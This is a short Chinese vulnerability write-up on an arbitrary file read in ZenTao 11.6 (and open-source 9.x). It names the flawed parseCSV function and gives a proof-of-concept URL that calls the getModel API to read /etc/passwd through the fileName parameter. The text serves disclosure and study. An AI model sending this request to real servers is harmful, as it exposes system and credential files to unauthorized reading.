禅道 11.6 任意文件读取

一、漏洞简介

禅道项目管理软件是一款国产的，基于LGPL协议，开源免费的项目管理软件，它集产品管理、项目管理、测试管理于一体，同时还包含了事务管理、组织管理等诸多功能，是中小型企业项目管理的首选，基于自主的PHP开发框架──ZenTaoPHP而成，第三方开发者或企业可非常方便的开发插件或者进行定制。 厂商官网：https://www.zentao.net/ 而此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的，因此禅道几乎所有的项目都受此漏洞影响

二、漏洞影响

禅道 11.6

禅道开源版 9版本

三、复现过程

漏洞代码位于module/file/model.php中的parseCSV函数

这里通过上面的思路同样可以对fileName进行赋值，最终返回读取的文件数据 漏洞poc为：

http://www.0-sec.org/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd

image